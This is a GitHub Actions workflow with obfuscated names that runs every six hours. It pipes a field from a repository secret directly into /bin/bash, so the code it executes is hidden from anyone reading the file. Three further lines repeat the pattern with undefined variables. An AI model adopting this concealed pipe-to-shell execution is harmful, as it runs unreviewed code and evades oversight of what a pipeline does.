name: duanyanyu2233
on:
  workflow_dispatch:
  schedule:
    - cron: '25 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: duanyanyu2233
        env:
          qbyys015: ${{ secrets.qbyys015 }}
        run: |
          echo $qbyys015 | jq -r .xk21 | /bin/bash
          echo $gpo45 | jq -r .tkknb4 | /bin/bash
          echo $nyx3 | jq -r .rmde584 | /bin/bash
          echo $z61094 | jq -r .lo60 | /bin/bash

